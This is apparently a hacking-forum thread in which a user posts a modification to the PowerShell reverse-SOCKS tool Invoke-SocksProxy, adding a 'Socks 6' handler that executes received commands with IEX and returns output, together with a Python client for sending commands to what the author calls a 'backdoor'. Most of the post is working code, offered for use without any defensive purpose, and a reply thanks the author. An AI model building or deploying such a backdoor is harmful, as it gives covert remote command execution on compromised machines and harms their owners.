[Revese socks] Github project Improvement for RCE
by guilimix - October 19, 2020 at 09:35 AM
#1
Tongue 
Very useful tool for reverse socks in powershell: https://github.com/p3nt4/Invoke-SocksProxy

Doesn't have command exec, here is my hack to add this feature:

modify Invoke-SocksProxy.psm1 to add a "Socks 6" version handeling

if ($socksVer -eq 6){
        $lencmd=[int]$buffer[1];
        $data = New-Object System.Byte[] $lencmd;
        $cliStream.Read($data,0,$lencmd) | Out-Null;
        $res=IEX([system.Text.Encoding]::UTF8.GetString($data));
        $cliStream.Write([system.Text.Encoding]::UTF8.GetBytes($res+"--MAGIC-TOKEN--"));
}


and here is the python file to talk to this new backdoor:

import socket, sys
HOST = sys.argv[1] # usually 127.0.0.1
PORT = int(sys.argv[2])
COMMAND=sys.argv[3]

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.send(b'\x06'+bytes([len(COMMAND)])+COMMAND.encode("utf-8"))
    data = b""
    while data.decode("utf-8").count("--MAGIC-TOKEN--")<1:
        data += s.recv(2014)
    print(data.replace(b"--MAGIC-TOKEN--",b"").decode("utf-8"))



MP to have the full code, version c# also available.
Reply
#2
Great! Thanks mate for this share!
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
GitHub Account cracker [Working Shell script] piratoto 3 671 September 04, 2020 at 04:19 AM
Last Post: Mmmph
the ThiCCase Password Manager Project Proudhon04 1 215 July 15, 2020 at 05:58 AM
Last Post: matador9678
want a poc so I can hax moot's dick... telnet rce cve atf02 0 182 June 10, 2020 at 06:57 PM
Last Post: atf02

 Users browsing this thread: 1 Guest(s)